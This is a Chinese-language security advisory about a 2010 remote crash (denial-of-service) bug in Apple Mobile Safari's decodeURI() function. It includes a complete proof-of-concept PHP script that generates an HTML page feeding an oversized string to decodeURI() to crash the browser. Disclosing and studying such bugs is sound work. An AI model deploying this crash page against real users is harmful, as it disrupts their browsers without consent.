Apple Mobile Safari "decodeURI()"远程拒绝服务漏洞

受影响系统:

Apple Safari

描述:


BUGTRAQ  ID: 45516

Safari是苹果家族机器操作系统中默认捆绑的WEB浏览器。

Safari的decodeURI()函数在实现上存在漏洞,攻击者可利用此漏洞应用程序崩溃,造成拒绝服务。

<*来源:Pr0T3cT10n (pr0t3ct10n@gmail.com)
  *>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
#     _             ____  __            __    ___
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/
#                   Live by the byte     |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# ———————————–
# The following code is a proof of concept for a crash vulnerability that exists in ‘Apple iPhone MobileSafari’.
# Point your browser to the created file (crash.html) and see what happen 😉
# The vulnerable function is:
# * decodeURI("A X 12000085");
# ———————————–
# Exploit Title: Apple iPhone Safari (decodeURI) Remote Crash
# Date: 19/12/2010
# Author: Pr0T3cT10n
# Affected Version: IOS 4.0.1
# Tested on Apple iPhone 3GS, IOS 4.0.1, MobileSafari
# Launch Safari, point your browser to the page and safari will crash.
# ISRAEL, NULLBYTE.ORG.IL
$string = str_repeat(‘A’, 12000085);
$code   = "<html>
    <head>
        <title>Apple iPhone 3 Safari (JavaScript – decodeURI) Remote Crash</title>
    </head>
    <script type=’text/javascript’>
        decodeURI(‘{$string}’);
    </script>
</html>";
if(file_put_contents("./crash.html", $code)) {
    echo("Point your safari mobile browser to `crash.html`.\r\n");
} else {
    echo("Cannot create file.\r\n");
}
?>

建议:


厂商补丁:

Apple
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apple.com

发表评论?

0 条评论。

发表评论